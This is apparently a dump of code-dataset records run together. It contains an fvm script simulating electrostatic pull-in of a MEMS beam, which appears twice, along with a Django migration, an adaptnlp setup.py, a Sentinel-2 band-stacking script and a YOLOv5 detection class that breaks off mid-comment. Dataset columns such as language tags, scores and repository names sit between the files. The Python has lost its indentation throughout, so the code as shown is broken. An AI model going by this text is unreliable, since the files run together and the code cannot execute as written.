solidBoundaryMeshes[0],
fluidMeshes)
for mesh in solidBoundaryMeshes:
faces = mesh.getFaces()
areaMag = geomFields.areaMag[faces]
faceCount = faces.getCount()
pot = areaMag.newSizedClone(faceCount)
pota = pot.asNumPyArray()
pota[:] = 0
elecFields.potential[faces] = pot
sbMeshFaces = solidBoundaryMeshes[0].getFaces()
ibManager.fluidNeighborsPerIBFace = 4
ibManager.solidNeighborsPerIBFace = 4
ibManager.fluidNeighborsPerSolidFace = 6
ibManager.update()
checkMarking(globalCount)
t1 = time.time()
pc.redirectPrintToFile("convergence.dat")
#--------------Timestep Loop --------------------------#
for n in range(0, numTimeSteps):
# --------------- update IBM -------------------------#
print "*** update IBM at globalCount %i ***" % globalCount
ibManager.update()
fluidMetricsCalculator.computeIBInterpolationMatrices(sbMeshFaces)
fluidMetricsCalculator.computeSolidInterpolationMatrices(sbMeshFaces)
#------------solve electrostatics--------#
print "*** solving electric model at globalCount %i ***" % globalCount
for i in range(0, 10):
emodel.computeIBFacePotential(sbMeshFaces)
emodel.advance(1)
emodel.computeSolidSurfaceForcePerUnitArea(sbMeshFaces)
#saveVTK(n)
#------------update force on beam ----------#
print "*** update force at globalCount %i ***" % globalCount
sbElecForce = elecFields.force[sbMeshFaces].asNumPyArray()
solidMesh = solidMeshes[0]
solidCells = solidMesh.getCells()
nCells = solidCells.getCount()
nSelfCells = solidCells.getSelfCount()
nSBFaces = sbMeshFaces.getCount()
if (nSBFaces != 2*nSelfCells+(nCells-nSelfCells)):
print "the extruded solid boundary mesh has wrong face numbers!"
force = plateFields.force[solidCells].asNumPyArray()
thickness = plateFields.thickness[solidCells].asNumPyArray()
force[:] = 0.
thickness[:] = beam_thickness
# force on interior cells
for c in range(0, nSelfCells):
botFaceIndex = c
topFaceIndex = c+nSelfCells
force[c] = sbElecForce[botFaceIndex][2] + sbElecForce[topFaceIndex][2]
# force on boundary cells
for c in range(nSelfCells, nCells):
force[c] = sbElecForce[nSelfCells+c][2]
#pdb.set_trace()
#------------solve structure-------------#
print "*** solving structure model at globalCount %i ***" % globalCount
for i in range (0, 3):
pmodel.advance(1)
dmodel.calculateNodeDisplacement()
dmodel.deformPlate()
solidMetricsCalculator.recalculate_deform()
#------------update solid boundary mesh---------------#
#solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
sbNodes = solidBoundaryMeshes[0].getNodes()
nSBNodes = sbNodes.getCount()
nodes = solidMeshes[0].getNodes()
if nSBNodes != nodes.getCount()*2:
print "the extruded solid mesh has wrong node number!"
nodeCoord = geomFields.coordinate[nodes].asNumPyArray()
bNodeCoord = geomFields.coordinate[sbNodes].asNumPyArray()
bMeshCoord = solidBoundaryMeshes[0].getNodeCoordinates().asNumPyArray()
deformation = geomFields.nodeDisplacement[nodes].asNumPyArray()
#pdb.set_trace()
for sbn in range (0, nSBNodes/2):
bNodeCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
bMeshCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
for sbn in range (nSBNodes/2, nSBNodes):
bNodeCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
bMeshCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
#pdb.set_trace()
#solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
#solidBoundaryMetricsCalculator.init()
solidBoundaryMetricsCalculator.recalculate_deform()
# -----------------update time --------------------------#
pmodel.updateTime()
dmodel.updateTime()
globalTime += timeStep
globalCount += 1
#------data output-----------------------#
writeProbeData()
if (n%saveFrequency == 0):
saveVTK(n)
# checkMarking(globalCount)
t2 = time.time()
pc.redirectPrintToScreen()
probeFile.close()
print '\nsolution time = %f' % (t2-t1)
| #!/usr/bin/env python
### this script solve frogleg pull-in by coupling
### plate model and electrostatics via IBM
### import modules ###
import pdb
import sys
import os
from math import *
sys.setdlopenflags(0x100|0x2)
#import tecplotExporter
import fvm.fvmbaseExt as fvmbaseExt
import fvm.importers as importers
import fvm.models_atyped_double as models
import fvm.exporters_atyped_double as exporters
from FluentCase import FluentCase
from fvm.fvmbaseExt import VecD3
from mpi4py import MPI
import time
def checkMarking(n):
cells = fluidMeshes[0].getCells()
nCells = cells.getCount()
cellCoords = geomFields.coordinate[cells].asNumPyArray()
fluidFile = open(fileBase + "fluidCells_" + str(n) + ".dat", "w")
solidFile = open(fileBase + "solidCells_" + str(n) + ".dat", "w")
IBFile = open(fileBase + "IBCells_" + str(n) + ".dat", "w")
cellIBType = geomFields.ibType[cells].asNumPyArray()
for c in range (0, nCells):
ibtype = cellIBType[c]
if ibtype == -1:
fluidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -2:
IBFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -3:
solidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -5:
print ("%i\t%i\t%e\t%e\n" % (c,ibtype, cellCoords[c][0], cellCoords[c][1]))
fluidFile.close()
solidFile.close()
IBFile.close()
def writeProbeData():
deformation = plateFields.deformation[solidMeshes[0].getCells()].asNumPyArray()
maxDef = deformation.min(axis = 0)
probeFile.write('%e\t%e\t%e\n' % (globalTime, deformation[probeIndex][2], maxDef[2]))
probeFile.flush()
def saveVTK(n):
writer = exporters.VTKWriterA(geomFields,fluidMeshes,
fileBase + "elecfield-" + str(n) + ".vtk",
"frogleg",
False,0)
writer.init()
writer.writeScalarField(elecFields.potential,"potential")
writer.writeVectorField(elecFields.electric_field,"potentialgradient")
writer.finish()
writer1 = exporters.VTKWriterA(geomFields,solidMeshes,
fileBase + "deformation-" + str(n) + ".vtk",
"frogleg",
False,0)
writer1.init()
writer1.writeVectorField(plateFields.deformation,"deformation")
writer1.finish()
### ========================== properties and parameters ===============================###
### beam
rho = 8912 # density kg/m^3
E = 200e9 # Young's modulus
nu = 0.31 # Poisson's ratio
### electric field
applied_voltage = -100
dielectric_constant = 1.0
beam_thickness = 3e-6
### mesh id
fluidTop = 7
fluidBot = [9,3]
fluidSide = 8
left_electrode = 4
right_electrode = 5
central_electrode = 6
beam = [3]
anchors = [4, 5, 6, 7]
numTimeSteps = 1
globalTime = 0
globalCount = 0
timeStep = 5e-8
saveFrequency = 50
initialTransient = False
probeIndex = 50
### ===================== mesh read ===============================================###
fileBase = "./"
### 2D plate mesh
beamReader = FluentCase(sys.argv[2])
beamReader.read();
solidMeshes = beamReader.getMeshList()
geomFields = models.GeomFields('geom')
solidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidMeshes)
solidMetricsCalculator.init()
### 3D fluid mesh
fluidReader = FluentCase(sys.argv[1])
fluidReader.read();
fluidMeshes = fluidReader.getMeshList()
fluidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,fluidMeshes)
fluidMetricsCalculator.init()
nodes = fluidMeshes[0].getNodes()
xn = fluidMeshes[0].getNodeCoordinates().asNumPyArray()
for n in range(0, nodes.getCount()):
x = xn[n][0]
y = xn[n][1]
xn[n][0] = -y
xn[n][1] = x
fluidMetricsCalculator.init()
### generate solid boundary mesh
solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
solidBoundaryMetricsCalculator.init()
### find device center
cells = solidMeshes[0].getCells()
xc = geomFields.coordinate[cells].asNumPyArray()
small = 100
probeIndex = 0
for c in range(0, cells.getCount()):
rsqr = xc[c][0]*xc[c][0] + xc[c][1]*xc[c][1]
if rsqr < small:
small = rsqr
probeIndex = c
### output files
probeFile = open(fileBase + "centerDisplacement.dat", "w")
### =============================== models =====================================###
### Plate Model and boundary conditions ###
plateFields = models.PlateFields('plate')
pmodel = models.PlateModelA(geomFields,plateFields,solidMeshes)
dmodel = models.PlateDeformationModelA(geomFields,plateFields,solidMeshes)
bcMap = pmodel.getBCMap()
for id in anchors:
bc = bcMap[id]
bc.bcType = 'Clamped'
bc['specifiedXRotation']=0
bc['specifiedYRotation']=0.
bc['specifiedZDeformation']=0.
for id in beam:
bc = bcMap[id]
bc.bcType = 'SpecifiedTraction'
vcMap = pmodel.getVCMap()
for i,vc in vcMap.iteritems():
vc['density'] = rho
vc['ym'] = E
vc['nu'] = nu
### electric model and boundary condition ###
elecFields = models.ElectricFields('elec')
emodel = models.ElectricModelA(geomFields,elecFields,fluidMeshes)
bcMap = emodel.getBCMap()
bc = bcMap[central_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = applied_voltage
bc = bcMap[left_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[right_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[fluidTop]
bc.bcType = "Symmetry"
for i in fluidBot:
bc = bcMap[i]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
for i in [fluidSide]:
bc = bcMap[i]
bc.bcType = "Symmetry"
vcMap = emodel.getVCMap()
for i,vc in vcMap.iteritems():
vc.vcType = "dielectric"
vc['dielectric_constant'] = dielectric_constant
### ================================= solvers ===================================###
### plate solver ###
pc = fvmbaseExt.AMG()
pc.verbosity=0
defSolver = fvmbaseExt.BCGStab()
defSolver.preconditioner = pc
defSolver.relativeTolerance = 1e-9
defSolver.absoluteTolerance = 1.e-30
defSolver.nMaxIterations = 50000
defSolver.verbosity=0
poptions = pmodel.getOptions()
poptions.deformationLinearSolver = defSolver
poptions.deformationTolerance=1.0e-3
poptions.setVar("deformationURF",1.0)
poptions.printNormalizedResiduals=True
poptions.timeDiscretizationOrder = 2
poptions.transient=True
poptions.scf = 5./6.
poptions.setVar('timeStep',timeStep)
### elec solver ###
epc = fvmbaseExt.AMG()
epc.verbosity=0
elecSolver = fvmbaseExt.BCGStab()
elecSolver.preconditioner = epc
elecSolver.relativeTolerance = 1e-3
elecSolver.nMaxIterations = 1000
elecSolver.maxCoarseLevels=20
elecSolver.verbosity=0
eoptions = emodel.getOptions()
eoptions.electrostaticsLinearSolver = elecSolver
eoptions.electrostaticsTolerance = 0.5e-5
eoptions.electrostatics_enable = 1
eoptions.chargetransport_enable = 0
eoptions.tunneling = 0
eoptions.ibm_enable = 1
eoptions.transient_enable = False
eoptions.printNormalizedResiduals = True
### initialize models and run ###
pmodel.init()
emodel.init()
dmodel.init()
ibManager = fvmbaseExt.IBManager(geomFields,
solidBoundaryMeshes[0],
fluidMeshes)
for mesh in solidBoundaryMeshes:
faces = mesh.getFaces()
areaMag = geomFields.areaMag[faces]
faceCount = faces.getCount()
pot = areaMag.newSizedClone(faceCount)
pota = pot.asNumPyArray()
pota[:] = 0
elecFields.potential[faces] = pot
sbMeshFaces = solidBoundaryMeshes[0].getFaces()
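### stencil sizes used for the immersed-boundary interpolations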
ibManager.fluidNeighborsPerIBFace = 4
ibManager.solidNeighborsPerIBFace = 4
ibManager.fluidNeighborsPerSolidFace = 6
ibManager.update()
checkMarking(globalCount)
t1 = time.time()
pc.redirectPrintToFile("convergence.dat")
#--------------Timestep Loop --------------------------#
for n in range(0, numTimeSteps):
# --------------- update IBM -------------------------#
print "*** update IBM at globalCount %i ***" % globalCount
ibManager.update()
fluidMetricsCalculator.computeIBInterpolationMatrices(sbMeshFaces)
fluidMetricsCalculator.computeSolidInterpolationMatrices(sbMeshFaces)
#------------solve electrostatics--------#
print "*** solving electric model at globalCount %i ***" % globalCount
for i in range(0, 10):
emodel.computeIBFacePotential(sbMeshFaces)
emodel.advance(1)
emodel.computeSolidSurfaceForcePerUnitArea(sbMeshFaces)
#saveVTK(n)
#------------update force on beam ----------#
print "*** update force at globalCount %i ***" % globalCount
sbElecForce = elecFields.force[sbMeshFaces].asNumPyArray()
solidMesh = solidMeshes[0]
solidCells = solidMesh.getCells()
nCells = solidCells.getCount()
nSelfCells = solidCells.getSelfCount()
nSBFaces = sbMeshFaces.getCount()
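    # the extruded boundary mesh should have one bottom and one top face per interior plate cell plus one side face per boundary cell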
if (nSBFaces != 2*nSelfCells+(nCells-nSelfCells)):
print "the extruded solid boundary mesh has wrong face numbers!"
force = plateFields.force[solidCells].asNumPyArray()
thickness = plateFields.thickness[solidCells].asNumPyArray()
force[:] = 0.
thickness[:] = beam_thickness
# force on interior cells
for c in range(0, nSelfCells):
botFaceIndex = c
topFaceIndex = c+nSelfCells
force[c] = sbElecForce[botFaceIndex][2] + sbElecForce[topFaceIndex][2]
# force on boundary cells
for c in range(nSelfCells, nCells):
force[c] = sbElecForce[nSelfCells+c][2]
#pdb.set_trace()
#------------solve structure-------------#
print "*** solving structure model at globalCount %i ***" % globalCount
for i in range (0, 3):
pmodel.advance(1)
dmodel.calculateNodeDisplacement()
dmodel.deformPlate()
solidMetricsCalculator.recalculate_deform()
#------------update solid boundary mesh---------------#
#solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
sbNodes = solidBoundaryMeshes[0].getNodes()
nSBNodes = sbNodes.getCount()
nodes = solidMeshes[0].getNodes()
if nSBNodes != nodes.getCount()*2:
print "the extruded solid mesh has wrong node number!"
nodeCoord = geomFields.coordinate[nodes].asNumPyArray()
bNodeCoord = geomFields.coordinate[sbNodes].asNumPyArray()
bMeshCoord = solidBoundaryMeshes[0].getNodeCoordinates().asNumPyArray()
deformation = geomFields.nodeDisplacement[nodes].asNumPyArray()
#pdb.set_trace()
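    # place the bottom sheet of the extruded boundary mesh at -t/2 and the top sheet at +t/2 of the deformed plate nodes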
for sbn in range (0, nSBNodes/2):
bNodeCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
bMeshCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
for sbn in range (nSBNodes/2, nSBNodes):
bNodeCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
bMeshCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
#pdb.set_trace()
#solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
#solidBoundaryMetricsCalculator.init()
solidBoundaryMetricsCalculator.recalculate_deform()
# -----------------update time --------------------------#
pmodel.updateTime()
dmodel.updateTime()
globalTime += timeStep
globalCount += 1
#------data output-----------------------#
writeProbeData()
if (n%saveFrequency == 0):
saveVTK(n)
# checkMarking(globalCount)
t2 = time.time()
pc.redirectPrintToScreen()
probeFile.close()
print '\nsolution time = %f' % (t2-t1)
| en | 0.337344 | #!/usr/bin/env python ### this script solve frogleg pull-in by coupling ### plate model and electrostatics via IBM ### import modules ### #import tecplotExporter ### ========================== properties and parameters ===============================### ### beam # density kg/m^3 # Young's modulus # Poisson's ratio ### electric field ### mesh id ### ===================== mesh read ===============================================### ### 2D plate mesh ### 3D fluid mesh ### generate solid boundary mesh ### find device center ### output files ### =============================== models =====================================### ### Plate Model and boundary conditions ### ### electric model and boundary condition ### ### ================================= solvers ===================================### ### plate solver ### ### elec solver ### ### initialize models and run ### #--------------Timestep Loop --------------------------# # --------------- update IBM -------------------------# #------------solve electrostatics--------# #saveVTK(n) #------------update force on beam ----------# # force on interior cells # force on boundary cells #pdb.set_trace() #------------solve structure-------------# #------------update solid boundary mesh---------------# #solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes] #pdb.set_trace() #pdb.set_trace() #solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes) #solidBoundaryMetricsCalculator.init() # -----------------update time --------------------------# #------data output-----------------------# # checkMarking(globalCount) | 1.893102 | 2 |
example/app/example/migrations/0001_initial.py | timrichardson/django-admin-search | 40 | 6616746 | # Generated by Django 2.2.2 on 2019-06-15 17:53
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('active', models.BooleanField(default=True)),
('description', models.TextField(max_length=500)),
('date', models.DateField()),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
},
),
]
| # Generated by Django 2.2.2 on 2019-06-15 17:53
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('active', models.BooleanField(default=True)),
('description', models.TextField(max_length=500)),
('date', models.DateField()),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
},
),
]
| en | 0.756509 | # Generated by Django 2.2.2 on 2019-06-15 17:53 | 1.847624 | 2 |
setup.py | DinaraN/adaptnlp | 1 | 6616747 | #!/usr/bin/env python
from pathlib import Path
from setuptools import setup, find_packages
version_file = Path(__file__).parent.joinpath("adaptnlp", "VERSION.txt")
version = version_file.read_text(encoding="UTF-8").strip()
with open("requirements.txt") as reqs_file:
install_requires = reqs_file.read().splitlines()
with open("requirements_dev.txt") as reqs_dev_file:
dev_requires = reqs_dev_file.read().splitlines()
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="adaptnlp",
version=version,
author="<NAME>",
author_email="<EMAIL>",
packages=find_packages(),
keywords=[
"NLP",
"flair",
"Natural Language Processing",
"Machine Learning",
"ML",
"torch",
"pytorch",
"NER",
],
install_requires=install_requires,
extras_require={
'dev': dev_requires
},
license="Apache 2.0",
description="AdaptNLP: A Natural Language Processing Library and Framework",
long_description=long_description,
long_description_content_type="text/markdown",
include_package_data=True,
zip_safe=True,
)
| #!/usr/bin/env python
from pathlib import Path
from setuptools import setup, find_packages
version_file = Path(__file__).parent.joinpath("adaptnlp", "VERSION.txt")
version = version_file.read_text(encoding="UTF-8").strip()
with open("requirements.txt") as reqs_file:
install_requires = reqs_file.read().splitlines()
with open("requirements_dev.txt") as reqs_dev_file:
dev_requires = reqs_dev_file.read().splitlines()
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="adaptnlp",
version=version,
author="<NAME>",
author_email="<EMAIL>",
packages=find_packages(),
keywords=[
"NLP",
"flair",
"Natural Language Processing",
"Machine Learning",
"ML",
"torch",
"pytorch",
"NER",
],
install_requires=install_requires,
extras_require={
'dev': dev_requires
},
license="Apache 2.0",
description="AdaptNLP: A Natural Language Processing Library and Framework",
long_description=long_description,
long_description_content_type="text/markdown",
include_package_data=True,
zip_safe=True,
)
| ru | 0.26433 | #!/usr/bin/env python | 1.737597 | 2 |
geoRpro/script/stack_sent2_bands.py | ESS-uzh/geoRpro | 0 | 6616748 | <filename>geoRpro/script/stack_sent2_bands.py
import os
import copy
from contextlib import contextmanager
from contextlib import ExitStack
import numpy as np
import rasterio
from rasterio.mask import mask
from rasterio.windows import Window
import shapely
from geoRpro.sent2 import Sentinel2
from geoRpro.raster import Rstack
import geoRpro.raster as rst
import pdb
INDIR = "/home/diego/work/dev/data"
s10 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R10m/"))
s20 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R20m/"))
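# process only the upper-left 3000 x 3000 pixel window of each band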
win = Window(0, 0, 3000, 3000)
with ExitStack() as stack_files:
ras10 = [stack_files.enter_context(rasterio.open(fp))
for fp in s10.get_fpaths('B02_10m', 'B03_10m', 'B04_10m', 'B08_10m')]
ras20 = [stack_files.enter_context(rasterio.open(fp))
for fp in s20.get_fpaths('B05_20m', 'B06_20m', 'B07_20m', 'B8A_20m', 'B11_20m', 'B12_20m')]
ras_final = ras10+ras20
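    # index order that rearranges the stack into ascending band order: B02, B03, B04, B05, B06, B07, B08, B8A, B11, B12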
order = [0, 1, 2, 4, 5, 6, 3, 7, 8, 9]
with ExitStack() as stack_action:
rstack = Rstack()
for idx, src in enumerate(ras_final):
if idx > 3: # resample to 10 m
print(f"scr to resample, res: {src.res}")
arr_r, meta = rst.load_resample(src)
src = stack_action.enter_context(rst.to_src(arr_r, meta))
print(f"scr resampled with res: {src.res}")
arr, meta = rst.load_window(src, win)
src = stack_action.enter_context(rst.to_src(arr, meta))
print(f"scr to add to the stack with res: {src.res}")
rstack.add_item(src)
rstack.set_metadata_param('interleave', 'band')
rstack.reorder_items(order)
fpath = rst.write_raster(rstack.items, rstack.metadata_collect, os.path.join(s10.dirpath, "S2B_T20MPA_20200803_Subset_med.tif"))
print(fpath)
| <filename>geoRpro/script/stack_sent2_bands.py
import os
import copy
from contextlib import contextmanager
from contextlib import ExitStack
import numpy as np
import rasterio
from rasterio.mask import mask
from rasterio.windows import Window
import shapely
from geoRpro.sent2 import Sentinel2
from geoRpro.raster import Rstack
import geoRpro.raster as rst
import pdb
INDIR = "/home/diego/work/dev/data"
s10 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R10m/"))
s20 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R20m/"))
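# process only the upper-left 3000 x 3000 pixel window of each band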
win = Window(0, 0, 3000, 3000)
with ExitStack() as stack_files:
ras10 = [stack_files.enter_context(rasterio.open(fp))
for fp in s10.get_fpaths('B02_10m', 'B03_10m', 'B04_10m', 'B08_10m')]
ras20 = [stack_files.enter_context(rasterio.open(fp))
for fp in s20.get_fpaths('B05_20m', 'B06_20m', 'B07_20m', 'B8A_20m', 'B11_20m', 'B12_20m')]
ras_final = ras10+ras20
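    # index order that rearranges the stack into ascending band order: B02, B03, B04, B05, B06, B07, B08, B8A, B11, B12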
order = [0, 1, 2, 4, 5, 6, 3, 7, 8, 9]
with ExitStack() as stack_action:
rstack = Rstack()
for idx, src in enumerate(ras_final):
if idx > 3: # resample to 10 m
print(f"scr to resample, res: {src.res}")
arr_r, meta = rst.load_resample(src)
src = stack_action.enter_context(rst.to_src(arr_r, meta))
print(f"scr resampled with res: {src.res}")
arr, meta = rst.load_window(src, win)
src = stack_action.enter_context(rst.to_src(arr, meta))
print(f"scr to add to the stack with res: {src.res}")
rstack.add_item(src)
rstack.set_metadata_param('interleave', 'band')
rstack.reorder_items(order)
fpath = rst.write_raster(rstack.items, rstack.metadata_collect, os.path.join(s10.dirpath, "S2B_T20MPA_20200803_Subset_med.tif"))
print(fpath)
| en | 0.807126 | # resample to 10 m | 2.239348 | 2 |
src/vision/scripts/predict_image.py | ucwxb/trash_sort | 0 | 6616749 | import sys
import os
# sys.path.append(rospy.get_param('/pkg_path/vision'))
import torch
from models.experimental import attempt_load
import numpy as np
from numpy import random
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords,
xyxy2xywh, plot_one_box, strip_optimizer, set_logging)
from utils.datasets import LoadStreams, LoadImages,letterbox
import cv2
class detectImage:
def __init__(self,modulePath,imgsz = 640,classes = 0,device=''):
        self.selectDevice(device)  # select GPU or CPU
        self.modulePath = modulePath  # path to the model weights
        self.model = attempt_load(modulePath, map_location=self.device)  # load the model
        self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names  # get class names
        self.colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(self.names))]  # assign a colour to each class
        self.classes = classes
        self.imgsz = imgsz  # inference image size
        self.update = 0  # flag marking whether the state has been updated
def selectDevice(self,device):
cpu_request = device.lower() == 'cpu'
cuda = False if cpu_request else torch.cuda.is_available()
self.device = torch.device('cuda:0' if cuda else 'cpu')
    def loadPic(self,frame):  # image preprocessing
self.src_img = frame.copy()
self.detect_img = frame
img = letterbox(self.detect_img, new_shape=self.imgsz)[0]
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).to(self.device)
img = img.float()
        img /= 255.0  # normalise to [0, 1]
if img.ndimension() == 3:
img = img.unsqueeze(0)
return img
def detect(self,frame,vision_detect_service_res):
        img = self.loadPic(frame)  # preprocess the input frame
        pred = self.model(img, augment=False)[0]  # run inference
        pred = non_max_suppression(pred, 0.4, 0.5, classes=None, agnostic=False)[0]  # NMS
if pred is not None and len(pred):
pred[:, :4] = scale_coords(img.shape[2:], pred[:, :4], self.detect_img.shape).round()
            pred = pred.detach().cpu().numpy()  # move predictions to host memory (works on CPU-only and GPU devices)
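            # keep only the detection with the highest confidence (column -2 of each prediction row is the confidence)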
max_indexs = np.argmax(pred, axis=0)
max_index = max_indexs[-2]
pred = pred[max_index]
*xyxy, conf, cls = pred
label = '%s %.2f' % (self.names[int(cls)], conf)
plot_one_box(xyxy, self.detect_img, label=label, color=self.colors[int(cls)])
vision_detect_service_res.isFind = 1
vision_detect_service_res.detect_res = cls
vision_detect_service_res.conf = conf
return vision_detect_service_res
# res_xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4))).view(-1).tolist()
# res_xyxy = torch.tensor(xyxy).view(-1).tolist()
# self.res_xywh.append(res_xywh)
# self.res_xyxy.append(res_xyxy)
            # diag_co = torch.tensor(xyxy).view(1, 4).detach().numpy().tolist()  # diagonal (corner) coordinates
            # xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()  # normalized xywh
            # center_co = (torch.tensor(xywh) * gn).detach().numpy().tolist()  # centre coordinates and width/height
            # label = '%s' % (self.names[int(cls)])
            # put_str = 'location:'
            # for rect in diag_co:  # draw box and label
# # rect = [int(i) for i in rect]
# # cv2.rectangle(self.im0, (rect[0],rect[1],rect[2],rect[3]), (0, 0, 255),6)
# cv2.rectangle(self.im0, (int(rect[0]),int(rect[1]),int(rect[2]),int(rect[3])), (0, 0, 255),6)
# # cv2.putText(self.im0, label, (rect[0],rect[1]), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# cv2.putText(self.im0, label, (int(rect[0]),int(rect[1])), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# put_str += str(rect)
# cv2.putText(self.im0, put_str, (10, 100), cv2.FONT_ITALIC, 3, (255, 0, 0), 6)
# self.diag_co = diag_co
# self.center_co = center_co
# self.label = label
# self.conf = conf
if __name__ == '__main__':
    # standalone smoke test; SimpleNamespace is only a stand-in for the ROS service response object
    from types import SimpleNamespace
    testM = detectImage('v5l-last.pt')
    frame = cv2.imread('2.png')
    res = testM.detect(frame, SimpleNamespace(isFind=0, detect_res=-1, conf=0.0))
| import sys
import os
# sys.path.append(rospy.get_param('/pkg_path/vision'))
import torch
from models.experimental import attempt_load
import numpy as np
from numpy import random
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords,
xyxy2xywh, plot_one_box, strip_optimizer, set_logging)
from utils.datasets import LoadStreams, LoadImages,letterbox
import cv2
class detectImage:
def __init__(self,modulePath,imgsz = 640,classes = 0,device=''):
        self.selectDevice(device)  # select GPU or CPU
        self.modulePath = modulePath  # path to the model weights
        self.model = attempt_load(modulePath, map_location=self.device)  # load the model
        self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names  # get class names
        self.colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(self.names))]  # assign a colour to each class
        self.classes = classes
        self.imgsz = imgsz  # inference image size
        self.update = 0  # flag marking whether the state has been updated
def selectDevice(self,device):
cpu_request = device.lower() == 'cpu'
cuda = False if cpu_request else torch.cuda.is_available()
self.device = torch.device('cuda:0' if cuda else 'cpu')
    def loadPic(self,frame):  # image preprocessing
self.src_img = frame.copy()
self.detect_img = frame
img = letterbox(self.detect_img, new_shape=self.imgsz)[0]
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).to(self.device)
img = img.float()
        img /= 255.0  # normalise to [0, 1]
if img.ndimension() == 3:
img = img.unsqueeze(0)
return img
def detect(self,frame,vision_detect_service_res):
        img = self.loadPic(frame)  # preprocess the input frame
        pred = self.model(img, augment=False)[0]  # run inference
        pred = non_max_suppression(pred, 0.4, 0.5, classes=None, agnostic=False)[0]  # NMS
if pred is not None and len(pred):
pred[:, :4] = scale_coords(img.shape[2:], pred[:, :4], self.detect_img.shape).round()
            pred = pred.detach().cpu().numpy()  # move predictions to host memory (works on CPU-only and GPU devices)
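            # keep only the detection with the highest confidence (column -2 of each prediction row is the confidence)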
max_indexs = np.argmax(pred, axis=0)
max_index = max_indexs[-2]
pred = pred[max_index]
*xyxy, conf, cls = pred
label = '%s %.2f' % (self.names[int(cls)], conf)
plot_one_box(xyxy, self.detect_img, label=label, color=self.colors[int(cls)])
vision_detect_service_res.isFind = 1
vision_detect_service_res.detect_res = cls
vision_detect_service_res.conf = conf
return vision_detect_service_res
# res_xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4))).view(-1).tolist()
# res_xyxy = torch.tensor(xyxy).view(-1).tolist()
# self.res_xywh.append(res_xywh)
# self.res_xyxy.append(res_xyxy)
            # diag_co = torch.tensor(xyxy).view(1, 4).detach().numpy().tolist()  # diagonal (corner) coordinates
            # xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()  # normalized xywh
